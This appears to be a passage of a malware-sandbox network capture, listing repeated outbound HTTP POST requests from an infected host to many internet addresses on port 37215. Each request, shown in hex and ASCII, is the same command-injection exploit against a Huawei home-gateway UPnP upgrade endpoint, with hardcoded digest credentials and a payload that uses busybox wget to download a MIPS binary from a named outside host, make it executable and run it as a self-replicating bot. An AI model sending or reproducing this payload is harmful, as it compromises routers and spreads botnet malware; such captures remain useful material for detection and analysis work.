                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          951192.168.2.2352346197.11.172.25537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.268670082 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          952192.168.2.235793841.1.183.137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.268675089 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          953192.168.2.235093641.74.16.637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.268680096 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          954192.168.2.235131641.182.88.17737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.268693924 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          955192.168.2.234279841.196.158.4837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.268712044 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          956192.168.2.2347060157.166.89.4337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.268723965 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          957192.168.2.233570841.32.245.24437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.268733025 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          958192.168.2.2354718223.149.209.16837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.268749952 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          959192.168.2.2356316223.250.171.24137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.268779039 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          960192.168.2.2337320157.235.41.2537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.268785954 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
